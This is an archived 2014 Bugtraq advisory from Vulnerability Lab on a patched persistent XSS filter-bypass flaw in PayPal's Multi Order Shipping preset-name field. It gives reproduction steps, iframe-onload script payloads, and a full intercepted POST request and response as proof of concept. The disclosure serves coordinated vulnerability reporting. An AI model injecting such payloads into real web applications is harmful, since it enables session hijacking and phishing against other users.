lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 07 Jul 2014 15:25:51 +0200
From: Vulnerability Lab <admin@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter
 Bypass & Persistent Vulnerability

Document Title:
===============
Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1050

PayPal Security UID: Pq115cey



Release Date:
=============
2014-05-14


Vulnerability Laboratory ID (VL-ID):
====================================
1050


Common Vulnerability Scoring System:
====================================
4


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United 
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers 
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation 
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team has discovered a filter bypass & persistent Web Vulnerability in the Paypal Inc core web application api.


Vulnerability Disclosure Timeline:
==================================
2013-08-15: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-08-16: Vendor Notification (PayPal Site Security Team - Bug Bounty Program)
2013-12-22: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty Program)
2014-05-10: Vendor Fix/Patch (PayPal Developer Team - Reward: Bug Bounty)
2014-05-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A filter bypass and persistent script code injection vulnerability has been discovered in the official Paypal service application and common service api. 
The vulnerability allows an attacker to inject own malicious script codes in the vulnerable module on the application side (persistent).

The vulnerability has been discovered in the Paypal MOS (Multi Order Shipping) Web Application (https://ship.paypal.com) and the vulnerability exists 
in the `Preset` module. While creating a new shipping preset, an attacker can inject malicious script code in the `Preset Name` field.

During the testing, the researcher was able to bypass the current security filters (client side input validation) by intercepting the POST requests and 
injecting the payloads directly instead of using the web interface. Affected URL is pasted below for your reference: https://ship.paypal.com/cgi-bin/shipweb?cmd=add-shipping-preset

The affected Parameter is:
<PresetName><![CDATA[Your Payload Here]]></PresetName>

The payload used during the testing is:
<![CDATA[<iframe src=a onload=alert(/TEST/)>]]>

The vulnerability is exploitable for stand alone user account but also for multi-accounts in paypal. The way of exploitation 
is remote and the risk is high because of the following scenario. A remote attacker is able to create multiple customer orders 
with injected payloads. When the admin merchant account user logs in and checks the Paypal Multi Online Shipping Orders, the 
exploit gets triggered.

The security 
risk of the filter bypass and persistent web vulnerability are estimated as medium with a cvss (common vulnerability scoring system) count of 4.0.

Exploitation of the persistent web vulnerability requires a low privileged paypal application user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent session hijacking, persistent phishing, persistent external redirects, 
persistent manipulation of affected or connected module web context.

Vulnerable Section(s):
				[+] Paypal Inc (API) - (https://www.paypal.com/en)

Vulnerable Module(s):
				[+] Settings > Shipping Presets > Create Shipping Preset

Vulnerable Field(s):
				[+] Preset Name

Vulnerable Parameter(s):
				[+] presentname


Proof of Concept (PoC):
=======================
The filter bypass and persistent validation web vulnerability can be reproduced by remote attackers with low privileged application user account with low 
user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Note:
You need two accounts to produce this PoC, #1 the Main Business Account and #2, the second low privileged user with limited access to only Paypal Multi Online Shipping Module.
 
1. Login to the shipping application as the Low Priviledged user
2. Goto Settings > Shipping Presets > Create Shipping Preset
3. Enter dummy data for a test
4. Fill up input fields with dummy data and before clicking 'Save', intercept the POST request using Tamper data or any other http proxy intercepting tool
5. Fill dummy data in all other fields (I used digits only during the POC)
6. Intercept the POST request and enter the payload under the <PresetName> field and click OK
7. Refresh your browser once, you should now have a new preset added in the shipping application

Multi User Accounts: PoC
To reproduce successfully, 
Log in the shipping application,
as the priviledged user, 
Goto settings and you will get a javascript popup proving the existance of this vulnerability.


Payload:
<![CDATA[%20<iframe src=http://www.vulnerability-lab.com onload=alert(/PoC/)>]]>


--- PoC Session Logs [POST] ---
POST /cgi-bin/shipweb?cmd=add-shipping-preset HTTP/1.1
Host: ship.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: text/xml; charset=UTF-8
Referer: https://ship.paypal.com/powership/shipping/dialogs/settings/settings.html?version=1_0_4
Content-Length: 558
Cookie: [Hidden]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<AddShippingPreset>
<AccountNumber>MBYAX9TQRRXHL</AccountNumber>
<PresetName><![CDATA[%20<iframe src=http://www.vulnerability-lab.com onload=alert(/PoC/)>]]></PresetName>
<ServiceTypeAndPackageID>005003</ServiceTypeAndPackageID>
<WeightRangeID>48</WeightRangeID>
<Irregular>false</Irregular>
<InsuranceValue><![CDATA[000]]></InsuranceValue>
<InsuranceSelected>false</InsuranceSelected>
<SignatureConfirmation>false</SignatureConfirmation>
<HidePostageCost>true</HidePostageCost>
<AutoPreset>false</AutoPreset>
<OverrideExistingSettings>false</OverrideExistingSettings>
</AddShippingPreset>


Response Logs:

HTTP/1.1 200 OK
Date: Fri, 16 Aug 2013 00:14:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: RouxWyWiKm3aD3COV0dah-P3yUq=TLxZwIHzn7e8476mU6cRiqM_j7BCvovfm_he1cL5wG0EsXN_pj_qsvGtaKzIokB8CM6dDO98y0j22gbMG2yHCxcPKj9AEX38zbdbC2tXy4BrllSV; 
domain=.paypal.com; path=/; Secure; HttpOnly
Connection: close
Content-Type: text/xml
Content-Length: 160

<?xml version="1.0" encoding="UTF-8"?>
<AddShippingPresetOutput>
	<OperationStatus>
		<StatusCode>0</StatusCode>
	</OperationStatus>
</AddShippingPresetOutput


Reference(s):
https://www.paypal.com/us/cgi-bin/webscr?cmd=_bulk-ship
https://ship.paypal.com/cgi-bin/shipweb?cmd=add-shipping-preset


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable input field `Preset Name`.
The input can also be restricted by disallowing special chars or a secure filter procedure.
The output listing with the saved item requires to encode the vulnerable present-name value to prevent further persistent injects via POST method request.


Security Risk:
==============
The security risk of the filter bypass and persistent input validation web vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]  -  Ateeq ur Rehman Khan (ateeq@...lution-sec.com) (www.vulnerability-lab.com)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       		- admin@...lution-sec.com
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

-- 
VULNERABILITY LABORATORY ADMINISTRATION
DOMAIN: www.vulnerability-lab.com
CONTACT: admin@...nerability-lab.com
PHONE: +4915776363337 (DE)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ